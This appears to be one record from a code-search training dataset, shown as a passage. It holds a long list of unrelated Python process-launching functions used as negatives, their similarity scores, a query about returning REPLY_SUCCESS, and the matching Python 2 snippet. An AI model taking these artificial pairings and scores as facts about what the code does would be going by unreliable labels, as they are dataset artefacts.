please trying to stop it before it starts.')\n return\n\n elif processor == 'kafka':\n if running_dict.has_key('kafka') and running_dict['kafka'] != 'Running' and running_dict['zookeeper']=='Running':\n try:\n cmd_line = self.cmd_start_kafka\n print('starting kafka------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n print ('kafka has been started!')\n return\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kafka'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['zookeeper']=='Stopped':\n print('zookeeper required starting before kafka is running!! please trying to \"start zookeeper\" first')\n return\n elif running_dict['kafka'] == 'Running':\n print('Kafka Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'zookeeper':\n if running_dict.has_key('zookeeper') and running_dict['zookeeper'] != 'Running':\n try:\n cmd_line = self.cmd_start_zookeeper\n # print('staring zookeeper------->')\n # print (cmd_line)\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n\n print('zookeeper has been started!')\n return\n except Exception as ex:\n print(\" Failed to stop processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('zookeeper'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Zookeeper Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'accl_processor':\n if running_dict:\n if running_dict['accl_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_accl_processor\n print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #cmd = subprocess.Popen(['nohup',cmd_line])\n # cmd = subprocess.Popen(cmd_line)\n\n print ('Accelerometer processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['accl_processor'] == 'Running':\n print('Accelerometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! 
You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'baro_processor':\n if running_dict:\n if running_dict['baro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_baro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Barometer processor has been started')\n\t\t\tprint (cmd_line)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['baro_processor'] == 'Running':\n print('Barometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'gyro_processor':\n if running_dict:\n if running_dict['gyro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_gyro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Gyroscope processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['gyro_processor'] == 'Running':\n print('Gyroscope processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'aggr_processor':\n if running_dict:\n if running_dict['aggr_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_aggr_naiv\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Aggregator processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['aggr_processor'] == 'Running':\n print('Aggregator processor is running!! 
please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print ('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n else:\n print ('Please type correct command! You may use \"help start\" see more help')", "def spawn(self):\n self._proc = subprocess.Popen(\n self._args, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )", "def fork(self):\n try:\n pid = os.fork()\n if pid > 0:\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"Fork failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)", "def start(self):\n self.start_time = dt.datetime.now()\n self.call = ' '.join(sys.argv)\n self.commands = []", "def _start_scrapy_process(self):\n cmd = self._parse_task_and_get_cmd()\n self.process = Popen(cmd, shell=True, stdout=PIPE,\n stderr=PIPE, preexec_fn=os.setsid)\n if self.task_data.get('with_best_seller_ranking', False):\n logger.info('With best seller ranking')\n cmd = self._parse_task_and_get_cmd(True)\n self.process_bsr = Popen(cmd, shell=True, stdout=PIPE,\n stderr=PIPE, preexec_fn=os.setsid)\n else:\n logger.info('Skipping best seller')\n logger.info('Scrapy process started for task #%s',\n self.task_data.get('task_id', 0))", "def startApplication(self, application):\n process = service.IProcess(application)\n if not self.config['originalname']:\n launchWithName(process.processName)\n self.setupEnvironment(\n self.config['chroot'], self.config['rundir'],\n self.config['nodaemon'], self.config['umask'],\n self.config['pidfile'])\n\n service.IService(application).privilegedStartService()\n\n uid, gid = self.config['uid'], self.config['gid']\n if uid is None:\n uid = process.uid\n if gid is None:\n gid = process.gid\n if uid is not None and gid is None:\n gid = pwd.getpwuid(uid).pw_gid\n\n self.shedPrivileges(self.config['euid'], uid, gid)\n app.startApplication(application, not self.config['no_save'])", "def start( self ):\n pathCheck( self.command )\n cout = '/tmp/' + self.name + '.log'\n if self.cdir is not None:\n self.cmd( 'cd ' + self.cdir )\n self.cmd( self.command + ' ' + self.cargs % self.port +\n ' 1>' + cout + ' 2>' + cout + '&' )\n self.execed = False", "async def start(self, args, env, cwd, port_expected_count,\n forward_stdout):\n if self._state != JobState.NEW:\n raise JobInvalidStateError('job cannot be restarted')\n self._process = polled_process.PolledProcess(args, env)\n self._process.on_finished.append(self._process_finished)\n self._state = JobState.PENDING\n cwd = pathlib.PurePath(cwd or '')\n if cwd.is_absolute():\n raise ValueError('job working directory path must be relative')\n if port_expected_count:\n port_discovery = polled_process.ProcessPortDiscovery.EXTERNAL\n else:\n port_discovery = polled_process.ProcessPortDiscovery.NONE\n process_kwargs = dict(\n port_discovery=port_discovery,\n workdir=str(self.sandbox.joinpath(cwd)),\n port_expected_count=port_expected_count\n )\n try:\n if forward_stdout:\n await self._process.start(\n stdout=None, stderr=None,\n **process_kwargs\n )\n else:\n stdout_path = 
self.sandbox.joinpath(self.FILENAME_STDOUT)\n stderr_path = self.sandbox.joinpath(self.FILENAME_STDERR)\n with open(stdout_path, 'wb') as stdout:\n with open(stderr_path, 'wb') as stderr:\n await self._process.start(\n stdout=stdout, stderr=stderr,\n **process_kwargs\n )\n self._state = JobState.RUNNING\n except Exception:\n self._state = JobState.FINISHED\n raise", "def test_application_start():\n\n process = subprocess.Popen(['python', 'runserver.py'],\n stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE)\n\n assert process.pid\n debug_logging = process.stdout.read(100)\n process.kill()\n assert 'Starting application' in debug_logging", "def launch(self):\n \n # Get local loggers from launchlogger decorator\n out_log = getattr(self, 'out_log', None)\n err_log = getattr(self, 'err_log', None)\n\n # Check the properties\n fu.check_properties(self, self.properties)\n\n if self.restart:\n output_file_list = [self.output_path]\n if fu.check_complete_files(output_file_list):\n fu.log('Restart is enabled, this step: %s will the skipped' % self.step, out_log, self.global_log)\n return 0\n\n # create command line instruction\n cmd = self.create_cmd(out_log, err_log)\n\n returncode = cmd_wrapper.CmdWrapper(cmd, out_log, err_log, self.global_log).launch()\n return returncode", "def _start(self):\n pass", "def _restartProcessNormal(self) -> None:\n\n if IS_WIN_SVC in sys.argv:\n reactor.callFromThread(reactor.stop)\n return\n\n python = sys.executable\n argv = list(sys.argv)\n\n def addExe(val):\n if not \"run_peek_\" in val:\n return val\n if isWindows and not val.lower().endswith(\".exe\"):\n return val + \".exe\"\n return val\n\n argv = map(addExe, argv)\n os.execl(python, python, *argv)", "def _start(self, host):\n pass", "def start_processing(self):", "def do_start(self, args) :\r\n if not self.wait2start:\r\n Thread(target=self.start_loop).start()\r\n self.wait2start = True\r\n else:\r\n self.__Logger.warn(\"Waiting for simulators to be ready. 
To force start, type \\\"forcestart\\\"\")", "def start_execution(self):\n self.send_message(\"control.start\",None)", "def _start_process(ngrok_path, config_path=None, auth_token=None, region=None):\n _ensure_path_ready(ngrok_path)\n\n start = [ngrok_path, \"start\", \"--none\", \"--log=stdout\"]\n if config_path:\n logger.info(\"Starting ngrok with config file: {}\".format(config_path))\n start.append(\"--config={}\".format(config_path))\n if auth_token:\n logger.info(\"Overriding default auth token\")\n start.append(\"--authtoken={}\".format(auth_token))\n if region:\n logger.info(\"Starting ngrok in region: {}\".format(region))\n start.append(\"--region={}\".format(region))\n\n process = subprocess.Popen(start, stdout=subprocess.PIPE, universal_newlines=True)\n atexit.register(_terminate_process, process)\n\n logger.info(\"ngrok process starting: {}\".format(process.pid))\n\n ngrok_process = NgrokProcess(ngrok_path, config_path, process)\n _current_processes[ngrok_path] = ngrok_process\n\n timeout = time.time() + 15\n while time.time() < timeout:\n line = process.stdout.readline()\n ngrok_process.log_boot_line(line.strip())\n\n if ngrok_process.healthy():\n logger.info(\"ngrok process has started: {}\".format(ngrok_process.api_url))\n break\n elif ngrok_process.startup_error is not None or \\\n ngrok_process.proc.poll() is not None:\n break\n\n if not ngrok_process.healthy():\n # If the process did not come up in a healthy state, clean up the state\n kill_process(ngrok_path)\n\n if ngrok_process.startup_error is not None:\n raise PyngrokNgrokError(\"The ngrok process errored on start.\", ngrok_process.startup_logs,\n ngrok_process.startup_error)\n else:\n raise PyngrokNgrokError(\"The ngrok process was unable to start.\", ngrok_process.startup_logs)\n\n return ngrok_process", "def _start(self, instance):\n try:\n # Attempt to start the VE.\n # NOTE: The VE will throw a warning that the hostname is invalid\n # if it isn't valid. 
This is logged in LOG.error and is not\n # an indication of failure.\n _, err = utils.execute('sudo', 'vzctl', 'start', instance['id'])\n if err:\n LOG.error(err)\n except ProcessExecutionError as err:\n LOG.error(err)\n raise exception.Error('Failed to start %d' % instance['id'])\n\n # Set instance state as RUNNING\n db.instance_set_state(context.get_admin_context(),\n instance['id'],\n power_state.RUNNING)\n return True", "def test_startProcess(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.pm.startProcess(\"foo\")\r\n self.assertIsInstance(self.pm.protocols[\"foo\"], LoggingProtocol)\r\n self.assertIn(\"foo\", self.pm.timeStarted.keys())", "def start_service(service_name):\n subprocess.run([SUPERVISOR_CMD, \"start\", service_name])", "def activateButtonClicked(self):\n print(\"trying to start process...\")\n subprocess.Popen(\"/usr/local/bin/g13d --config /usr/local/bin/defaults.bind\", shell=True)\n self.checkProcess()", "def start(self): # pragma: no cover\n # Start the HAL and Fake Driver\n if self.hal_cmd_line:\n self.logger.info(\"Start the hal main process...\")\n process_obj = self.start_process(self.hal_cmd_line)\n self.hal_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.hal_process)\n\n # wait a period for process start and init complete\n time.sleep(self.PROCESS_INIT_PERIOD)\n if self.fake_driver_cmd_line:\n self.logger.info(\"Start the fake driver process...\")\n process_obj = self.start_process(self.fake_driver_cmd_line)\n self.fake_driver_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.fake_driver_process)\n\n for agent_name in self.agent_dict:\n self.logger.info(\"start agent process {}...\".format(agent_name))\n popenObj = self.start_process(self.agent_dict[agent_name])\n self.agent_obj[agent_name] = {\n \"process\": popenObj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.agent_obj[agent_name])\n\n # wait a period for agent start and init complete\n alive_status = False\n for timeout in range(self.WAITING_FOR_AGENT_STARTUP_RETRY):\n alive_status = ProcessAgent.is_all_agent_started()\n if not alive_status:\n time.sleep(1)\n if not alive_status:\n self.logger.error('Not all agent startup normally, reboot the system.')\n SysTools.sys_failure_reboot(reason='Not all agent startup')\n SysTools.diagnostic_self_test_fail('Communication error', 'Not all agent startup', 'Severity level=error')\n\n # start the manager process\n self.logger.info(\"Start the manager process...\")\n process_obj = self.start_process(self.manager_cmd_line)\n self.manager_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.manager_process)\n\n # start the fault_manager process\n self.logger.info(\"Start the fault manager process...\")\n process_obj = self.start_process(self.fault_manager_cmd_line)\n self.manager_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.manager_process)\n\n if self.ptp_driver_cmd_line:\n self.logger.info(\"Start the ptp driver client process...\")\n process_obj = self.start_process(self.ptp_driver_cmd_line)\n self.ptp_driver_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.ptp_driver_process)\n\n if self.res_hal_cmd_line:\n self.logger.info(\"Start the resource hal client process...\")\n 
process_obj = self.start_process(self.res_hal_cmd_line)\n self.res_driver_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.res_driver_process)\n\n if self.ssd_driver_cmd_line:\n self.logger.info(\"Start the ssd driver client process...\")\n process_obj = self.start_process(self.ssd_driver_cmd_line)\n self.ssd_driver_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.ssd_driver_process)\n\n while True:\n time.sleep(5)\n # monitor the all process\n manager_debugability.debugability_traceback()\n\n # monitor the manager process, will not retry....\n if self.manager_process is not None and self.manager_process['process'] is None:\n self.logger.error(\n \"Manager process is not up, reboot the system.\")\n if self.simulator_flag:\n sys.exit(-1)\n else:\n SysTools.sys_failure_reboot(reason=\"Manager process is not up\")\n SysTools.diagnostic_self_test_fail('Processing error', 'Manager process is not up',\n 'Severity level=error')\n\n for agent in self.agent_obj:\n # check if agent instance create succeed, retry if failure\n if None is self.agent_obj[agent][\"process\"]:\n if self.agent_obj[agent][\"retries\"] < self.AGENT_RETRIES_MAX:\n self.logger.warn(\n 'Agent %s retries %d times', agent, self.agent_obj[agent][\"retries\"])\n self.agent_obj[agent][\"process\"] = self.start_process(self.agent_dict[agent_name])\n self.agent_obj[agent][\"retries\"] += 1\n self.logger.warn('Agent %s retries %d times', agent, self.agent_obj[agent][\"retries\"])\n manager_debugability.debugability_process_monitor(self.agent_obj[agent])\n continue\n else:\n # FixMe: reboot system or ?\n self.logger.error('Agent %s retries times exceed, will reboot...', agent)\n SysTools.sys_failure_reboot(reason=\"Agent {0} retries times exceed\".format(agent))\n SysTools.diagnostic_self_test_fail('Communication error',\n \"Agent {0} retries times exceed\".format(agent),\n 'Severity level=error')\n\n if self.check_process_status(self.agent_obj[agent][\"process\"]) != self.PROCESSSTATE_ALIVE:\n self.logger.error(\n '%s process is dead, reboot the system.', agent)\n # FixMe: reboot system or restart agent\n SysTools.sys_failure_reboot(reason=\"{0} process is dead\".format(agent))\n SysTools.diagnostic_self_test_fail('Processing error', \"{0} process is dead\".format(agent),\n 'Severity level=error')\n # check other critical processes\n if self.ptp_driver_cmd_line:\n if self.check_process_status(self.ptp_driver_process[\"process\"]) != self.PROCESSSTATE_ALIVE:\n self.logger.error(\"ptp hal driver process is dead\")\n SysTools.sys_failure_reboot(reason=\"ptp hal driver process is dead\")\n SysTools.diagnostic_self_test_fail('Processing error', \"ptp hal driver process is dead\",\n 'Severity level=error')", "def start_process(check_id, storage, processes):\n\n process = Process(target=perform_check, args=(check_id,\n storage[check_id]['command'],\n storage[check_id]['freq'],))\n\n # Set process name to \"Process+check_id\"\n process.name = 'Process{}'.format(check_id)\n process.start()\n\n # Add process to processes dict with key=pid and value=processname\n processes[process.pid] = process\n storage[check_id]['pid'] = process.pid", "def start_as_service(self):\n from ..program_manager import ProgramManager\n send_action(ProgramManager.NAME, 'start', self.name)", "def start(self) -> None:\n self.should_exit = False\n self._main_thread = threading.Thread(target=self._wrap_start, daemon=True)\n 
self._main_thread.start()", "def test_startService(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n # Schedule the process to start\r\n self.pm.startService()\r\n # advance the reactor to start the process\r\n self.reactor.advance(0)\r\n self.assertTrue(\"foo\" in self.pm.protocols)", "def start_launch(self, _, **kwargs):\n self._handle_lifecycle = False if self._rp.launch_id else True\n self._launch_id = self._rp.launch_id or self._rp.start_launch(\n name=self._cfg.launch_name,\n start_time=timestamp(),\n attributes=self._get_launch_attributes(),\n description=self._cfg.launch_description,\n rerun=self._cfg.rerun,\n rerun_of=self._cfg.rerun_of,\n **kwargs,\n )", "def _launchAgentProcess( self ):\n return subprocess.Popen( [ sys.executable, os.path.join( sys.path[0], 'agentProcess.py' ), str( _processPid ) ], stdin=subprocess.PIPE, stdout=subprocess.PIPE )", "async def start_program(self):\n program_payload = self._program[\"program\"]\n await self._send_program_message(program_payload)", "def start(self):\n self.parent.start(auto_terminate=False)\n self.started = True", "def start(self, hook_url=None):\n\n self.on_start()\n\n if hook_url:\n self.register(hook_url=hook_url)\n\n else:\n p = Process(target=self.run)\n p.daemon = True\n p.start()\n return p", "def start(self):\n\t\treturn Job(SDK.PrlVm_Start(self.handle)[0])", "def _spawn_simple_process(self, process_id, name, module, cls, config, proc_attr):\n process_instance = self._create_process_instance(process_id, name, module, cls, config, proc_attr)\n # Add publishers if any...\n publish_streams = get_safe(config, \"process.publish_streams\")\n pub_names = self._set_publisher_endpoints(process_instance, publish_streams)\n\n # cleanup method to delete process queue (@TODO: leaks a bit here - should use XOs)\n def cleanup(*args):\n for name in pub_names:\n p = getattr(process_instance, name)\n p.close()\n\n proc = self.proc_sup.spawn(name=process_instance.id,\n service=process_instance,\n listeners=[],\n proc_name=process_instance._proc_name,\n cleanup_method=cleanup)\n proc.proc._glname = \"ION Proc %s\" % process_instance._proc_name\n self.proc_sup.ensure_ready(proc, \"_spawn_simple_process for %s\" % process_instance.id)\n\n # map gproc to process_instance\n self._spawned_proc_to_process[proc.proc] = process_instance\n\n # set service's reference to process\n process_instance._process = proc\n\n self._process_init(process_instance)\n self._process_start(process_instance)\n\n return process_instance", "def start_game(self):\n env = os.environ.copy()\n hook_path = os.path.join('hook', 'libhook.so')\n game_path = os.path.join(env.get('HOME'), '.local', 'share', 'Steam',\n 'steamapps', 'common', 'Super Hexagon',\n 'SuperHexagon')\n\n env['LD_PRELOAD'] = os.path.abspath(hook_path)\n args = [\"bash\", game_path]\n\n self.controller.handle_keys([])\n\n self.frame_counter = 0\n self.dead_until = None\n\n self.game_process = subprocess.Popen(\n args,\n env=env,\n # stdout=subprocess.DEVNULL,\n )", "def start_ex(self, nStartMode = consts.PSM_VM_START, nReserved = 0):\n\t\treturn Job(SDK.PrlVm_StartEx(self.handle, nStartMode, nReserved)[0])", "def start(self):\n return self.setup.start", "def do_start(self, line):\n\n if not line:\n line = \"cortex\"\n\n # First, check that the name isn't already taken\n clients = self.registry.get_clients()\n if clients.has_key(line):\n print \"A server already exists with that name (%s)\" % line\n return False\n\n subprocess.Popen([\"python\", \"cortex.py\", line])\n # Wait for the system to init\n 
time.sleep(1)\n print \"Started server, connecting...\"\n return self.do_connect(line)", "def _spawn_immediate_process(self, process_id, name, module, cls, config, proc_attr):\n process_instance = self._create_process_instance(process_id, name, module, cls, config, proc_attr)\n self._process_init(process_instance)\n self._process_start(process_instance)\n return process_instance", "def start(self):\n self._task.start()", "def start(self):\n self._task.start()", "def launch_vm(self):\r\n self._print(\"Starting VM\")\r\n options = [self.vboxheadless,'-startvm',self.vm_name]\r\n options.extend(self.vboxheadless_start_options)\r\n self.popen = subprocess.Popen(options)\r\n# result = process.wait()\r\n result = \"(other thread)\"\r\n self._print(\"Started %s\" % result)", "def startCommand(self):\n commandLine = \"su - %s -c \\\"%s/startservers \\\" \" % (self.runAsUser, self.boHome)\n return self.submitCommand(commandLine)", "def launch(self):\n self._fork()\n self._lock()\n os.setegid(self._user[1])\n os.seteuid(self._user[0])\n self._loop = True\n signal.signal(signal.SIGTERM, self.__signalHandler)\n sys.stdout = self._output\n sys.stderr = self._error\n self._run()\n sys.stdout = self._stdout\n sys.stderr = self._stderr\n os.setegid(0)\n os.seteuid(0)\n self._unlock()", "def start(self):\n if self.process:\n return True\n if self.host:\n cmd = \"ssh -Y root@%s\" % self.host\n else:\n cmd = \"su -c\"\n cmd += \" 'echo _GO_ && larchin-0call'\"\n # Run the command as root with pexpect.\n # Return True if it succeeded, else False.\n p = pexpect.spawn(cmd, timeout=None)\n e = p.expect([\"_GO_.*\\n\", pexpect.TIMEOUT, \"Password:\"], 5)\n while e != 0:\n if e == 2:\n ok, pw = ui.textLineDialog(_(\"Please enter root password\"),\n \"larchin: root pw\", pw=True)\n if not ok:\n run_error( _(\"No root password, cancelling run\"))\n return False\n\n p.sendline(pw.strip())\n e = p.expect([\"_GO_.*\\n\", pexpect.TIMEOUT, pexpect.EOF], 5)\n else:\n run_error(_(\"Couldn't start larchin-0call\"))\n return False\n self.process = p\n p.setecho(False)\n\n # Start a thread to read input from 0call.\n command.simple_thread(self.read0call)\n # Perform initialization of the installation system\n ok, textlines = self.xlist(\"init\")\n if not ok:\n run_error(_(\"Couldn't initialize installation system:\\n\\n%s\")\n % \"\\n\".join(textlines))\n return ok", "def start(self):\n # it may break during task parsing, for example wrong server name or\n # unsupported characters in the name os spider\n try:\n start_time = datetime.datetime.utcnow()\n self.start_date = start_time\n self.task_data['start_time'] = \\\n time.mktime(self.start_date.timetuple())\n self._start_scrapy_process()\n # self._push_simmetrica_events()\n first_signal = self._get_next_signal(start_time)\n except Exception as ex:\n logger.warning('Error occurred while starting scrapy: %s', ex)\n return False\n try:\n self._run_signal(first_signal, start_time)\n return True\n except FlowError as ex:\n self._signal_failed(first_signal, datetime.datetime.utcnow(), ex)\n self._finish()\n return False", "def start(self) -> None:\r\n self._spawn_ffmpeg()", "def setUp(self):\n self.p = Process(target = start_server)\n self.p.start()\n time.sleep(0.5)", "def start(self):\n\n self._task.start()", "def start_server_proc(event, server_cmd, checking_env):\n proc = subprocess.Popen(server_cmd, env=checking_env)\n\n # Blocking termination until event is set.\n event.wait()\n\n # If proc is still running, stop it.\n if proc.poll() is None:\n proc.terminate()", "def 
startapp():", "def start(self):\n raise NotImplementedError", "def start(self):\n raise NotImplementedError", "def start(self):\n raise NotImplementedError", "def start(self):\n \n rpc = self.smartstarter.rpcsystem\n \n process = yield self.smartstarter.start()\n \n try:\n \n make_worker_url = yield process.get_function_url(make_worker)\n make_worker_stub = rpc.create_function_stub(make_worker_url)\n \n worker = yield make_worker_stub(\"local\") # TODO remove network\n \n worker.get_function_url = process.get_function_url_stub\n \n worker.reset = rpc.create_local_function_stub(process.reset)\n worker.stop = rpc.create_local_function_stub(process.stop)\n worker.kill = rpc.create_local_function_stub(process.kill)\n worker.stdout = process.stdout.make_stub(rpc)\n worker.stderr = process.stderr.make_stub(rpc)\n worker.exited = process.exited.make_stub(rpc)\n\n except:\n process.kill()\n raise \n \n\n \n # worker.stdout.add_callback(stdout)\n # worker.stderr.add_callback(stderr)\n \n# receiver_stub = rpc.create_local_function_stub(hook.receiver)\n# hookinstall_url = yield process.get_function_url(hook.install_hook)\n# hookinstall_url_stub = rpc.create_function_stub(hookinstall_url)\n# yield hookinstall_url_stub(receiver_stub)\n \n defer.returnValue(worker)", "def platform_start(self):\n self.platform.start()", "def start(self):\n with self._lock:\n if not self.started():\n self._started = None\n getattr(self.factory, 'start_' + self.class_name())(self)", "def launch_new_process(self, config_settings, create_status_output_file):\n # Clear temp folder since a new Core process is to be launched\n self.ext_env_handler.delete_temp_folder_contents()\n\n # create Status file\n if create_status_output_file:\n self.ext_output_status_handler.write_status_file(config_settings.__getattribute__(self.config_public_settings.operation), self.seq_no, status=self.status.Transitioning.lower())\n else:\n self.ext_output_status_handler.update_file(self.seq_no)\n # launch core code in a process and exit extension handler\n process = self.process_handler.start_daemon(self.seq_no, config_settings, self.ext_env_handler)\n self.logger.log(\"exiting extension handler\")\n exit(Constants.ExitCode.Okay)", "def start(self) -> None:\n start_thread(super().start, self.__class__.__name__)", "async def start(self, regs=None):\n if regs is None:\n regs = reversed(self._regs)\n cmd = \"start{}\".format(self._fmt_regs(regs))\n assert len(cmd) == 5 + 6*8\n self.do(cmd)\n ret = (await self.read(4)).strip()\n if ret != \"ok\":\n raise ValueError(\"start failed\", ret)", "async def start(self, raise_on_fail: bool = False) -> None:\n try:\n await self._rpc.start()\n except InvalidPipe:\n if raise_on_fail:\n raise\n self._rpc = None" ]
[ "0.79140174", "0.7580194", "0.73277956", "0.7258669", "0.724767", "0.7187015", "0.7183471", "0.7030207", "0.7023982", "0.70187926", "0.7007485", "0.69129544", "0.6842755", "0.6826997", "0.68093807", "0.672955", "0.66865253", "0.6634776", "0.6593981", "0.6587125", "0.6586577", "0.6566555", "0.65434563", "0.6532303", "0.6530813", "0.6530813", "0.6530813", "0.6530813", "0.64971465", "0.64875907", "0.6440239", "0.64250714", "0.6404629", "0.64012635", "0.63938284", "0.63902014", "0.63844526", "0.63541657", "0.63458914", "0.6333013", "0.6283198", "0.62788904", "0.62701374", "0.6265256", "0.6257093", "0.62417495", "0.6239104", "0.6235003", "0.6209381", "0.6200457", "0.61788493", "0.6177837", "0.61743265", "0.6174005", "0.61727715", "0.6172638", "0.6163399", "0.6155497", "0.61522657", "0.61307806", "0.6098381", "0.60887665", "0.6085919", "0.6084334", "0.6076052", "0.6073166", "0.60664475", "0.606438", "0.60539", "0.60481966", "0.6046054", "0.60364336", "0.6035961", "0.60321194", "0.6027947", "0.60234696", "0.60172117", "0.60167056", "0.6012208", "0.6008841", "0.6008841", "0.6006892", "0.6002102", "0.59914756", "0.5981114", "0.5979771", "0.59789133", "0.5977467", "0.59683484", "0.5962684", "0.5960916", "0.59545517", "0.59545517", "0.59545517", "0.59484005", "0.59475464", "0.59446895", "0.5939435", "0.5937645", "0.5936961", "0.5932876" ]
0.0
-1
Just return the REPLY_SUCCESS
def _sendStart_result (self, (code, data)) :\n\n        assert code == "REPLY_SUCCESS"\n\n        return code
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _tunnel_success(tunnel_returncode):\n return tunnel_returncode < 0", "def execute_success(self, *args, **kwargs):\n return 0, self.shell_output, None", "def action_success(self, resp):\n return resp[0] in SUCCESS_CODES", "def action_success(self, resp):\n return resp[0] in SUCCESS_CODES", "def successful(self) -> bool:\n pass", "def successful(self):\n return (self.power_ack & self.datarate_ack & self.channelmask_ack) == 1", "def get_success_flag(self):\n return True", "def success(self, result):\r\n raise NotImplementedError", "def success(self):\n self.succeeded = True", "def process(self):\n # return ProcessorResult(True, _('OK'))\n return (True, _(\"OK\"))", "def IsOk(self):\r\n \r\n return True", "def success(self, appstruct):\n \n return None", "def succeed(self,args):\n code, msg, val = args\n if code != 1:\n raise ROSParamException(msg)\n return val", "def success(self, msg):\n print \"comm succeded\"\n return msg", "def is_success(msg):\n return msg['status'] == 'success'", "def result(self, state, action):\n print \"Ashish\"\n return 1", "def return_(x):\n return Pass(x)", "def success(cls, retval, retvalname='value'):\r\n if isinstance(retval, dict) and retvalname is None:\r\n retval[\"__result__\"] = \"success\" # TODO: right here just modified input dict. That's not good\r\n else:\r\n retval = {\"__result__\": \"success\", 